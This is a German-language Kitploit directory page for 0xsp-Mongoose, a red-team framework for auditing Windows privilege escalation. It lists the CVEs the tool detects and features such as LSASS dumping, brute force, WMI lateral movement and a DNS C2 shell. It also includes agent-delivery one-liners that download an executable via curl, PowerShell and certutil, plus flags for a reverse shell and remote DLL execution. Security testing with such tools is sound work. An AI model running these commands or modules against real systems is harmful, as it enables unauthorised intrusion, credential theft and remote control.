Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
0xsp-Mongoose — Ein einzigartiges Framework für Cybersicherheitssimulation und Red-Teaming-Operationen, Windows-Audit auf neuere Schwachstellen, Fehlkonfigurationen und Privilegieneskalationsangriffe, Nachahmen der Taktiken und Techniken eines fortgeschrittenen Gegners in einem Netzwerk. | Kitploit
Tools/GitHubGitHub/zux0x3a/0xsp-mongoose
Privilege EscalationSchwachstellenscannerNetzwerkkartierungPasswortangriffeExploitationLaterale BewegungWebanwendungs-ExploitationPost-ExploitationCommand and ControlRed TeamingDNS-AnalyseArchived
534117vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubzux0x3a/0xsp-mongoose

0xsp-Mongoose

Ein einzigartiges Framework für Cybersicherheitssimulation und Red-Teaming-Operationen, Windows-Audit auf neuere Schwachstellen, Fehlkonfigurationen und Privilegieneskalationsangriffe, Nachahmen der Taktiken und Techniken eines fortgeschrittenen Gegners in einem Netzwerk.

Repository anzeigenWebseite

GPLv3 license

Unterstützen Sie das Projekt für die kontinuierliche Entwicklung (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED für Windows

Aktuelle Version 2.2.0

Die 0xsp Mongoose RED Version wird bereitgestellt, um Ihre Anforderungen während der Cybersicherheitssimulation zu unterstützen. Mit dieser Version können Sie ein Windows-Betriebssystem auf Systemschwachstellen, Fehlkonfigurationen und Privilege-Escalation-Angriffe überprüfen und die Taktiken und Techniken eines fortgeschrittenen Angreifers in einem Netzwerk replizieren.

Mit Node.js-Unterstützung für die Webanwendungs-API wird die Installation und Anpassung in kurzer Zeit viel einfacher. Der Windows-Sensor-Agent kommuniziert mit der Anwendungs-API, um Ergebnisse zu übertragen und Befehle als bidirektionale Technik zu empfangen.

Der Agent kann Windows-Exploits mithilfe der Module Windows Update API und Exploit Database Definitions erkennen und identifizieren. Die neue Version erkennt auch die folgenden Schwachstellen:

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

Funktionen

  • Techniken zur Windows-Privilegienausweitung.
  • Webanwendung, erstellt mit NodeJS
  • Unterstützt SQLite-DB
  • Techniken für laterale Bewegungen. Video
  • Bidirektionaler Kommunikationskanal. Video
  • Online-Paketierung von Plugins.
  • Verbesserte Skript-Engine zur Erkennung von Exploits.
  • Windows-Konto-Brute-Force-Modul (Lokal / Domäne)
  • Waffeneinsatz der Windows-API-Funktion run-as-user. Video
  • Lokales Netzwerk-Scanning und Freigabe-Aufzählung.
  • LSASS-Speicherabbild-Technik (Plugin).
  • Interaktiver DNS-C2C-Shell-Modus

Installation

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

Standard-Anmeldeinformationen:

  • Benutzername: admin
  • Passwort: 0xsp

DNS-C2C-Python-Skript

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

Schnelle Bereitstellung des Agents

root@kitploit:~
#example 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

Verwendung

root@kitploit:~
-s --Windows-Dienste und installierte Treiber abrufen.
-u --Informationen über Benutzer, Gruppen und Rollen abrufen.
-c --Verbundene Treiber nach sensiblen Konfigurationsdateien anhand der Erweiterung durchsuchen.
-n --Netzwerkinformationen, Netzwerkschnittstellen, Verbindungsdetails abrufen.
-w --Beschreibbare Verzeichnisse auflisten, Zugriffsberechtigungen prüfen, geänderte Berechtigungen.
-i --Windows-Systeminformationen, Sitzungen, Prüfung auf immer erhöhte Rechte auflisten.
-l --In einer beliebigen Datei nach einer bestimmten Zeichenfolge suchen, z. B.: agent.exe -l c:\ password *.config.
-o --Host-Adresse der NodeJS-Anwendung angeben, Sie können auch srvhost verwenden.
-p --Installierte Software, ausgeführte Prozesse, Aufgaben auflisten.
-e --Kernel-Inspektionstool, das bei der Suche in Tool-Datenbanken nach Windows-Kernel-Schwachstellen hilft.
-x --Passwort zur Autorisierung Ihrer Verbindung mit der NodeJS-Anwendung.
-d --Dateien direkt auf den Zielcomputer herunterladen.
-t --Dateien vom Zielcomputer in die NodeJS-Anwendung hochladen.
-spooler --Einzelnen Host oder Liste von Hosts auf mögliche CVE-2021-1675 scannen (z. B. -spooler -srvhost oder -spooler -hosts).
-m --Alle bekannten Scan-Typen zusammen ausführen.

[!] RED-TEAMING-TAKTIKEN ABSCHNITT

-r --Reverse-Shell mit einem bestimmten Konto starten.
-lr --Technik für laterale Bewegung mittels WMI (z. B. -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip).
-nds --Netzwerkerkennung und Freigabe-Aufzählung.
-dns --Interaktive DNS-C2C-Shell herstellen.
-cmd --Befehle über HTTP-Shell übertragen.
-interactive --Interaktiven Modus starten (z. B. Plugins laden usw.).
-username --Identitätsauthentifizierung für bestimmte Angriffsmodule.
-password --Identitätsauthentifizierung für bestimmte Angriffsmodule.
-host --Remote-Host identifizieren, gegen den ein Angriff durchgeführt werden soll.
-srvhost --Remote-Host der NodeJS-Anwendung festlegen.
-bf --Brute-Force-Modul für lokale Benutzer / Domänenbenutzer.
-import --DLL-Datei lokal importieren und ausführen.
-remote --DLL-Datei von einem Remote-Host importieren und ausführen.

Dokumentationen

https://0xsp.com/security%20dev/0xsp-mongoose-red

Detaillierte Forschungsseite

https://0xsp.com

Sicherheitskonferenzen

  • Standoff365 - Russland (https://standoff365.com/conferences/357)

Tool-Tutorials

Abonnieren Sie den folgenden Kanal, um benachrichtigt zu werden, wenn neue Tutorials und Tricks für 0xsp veröffentlicht werden. https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

Tool herunterladen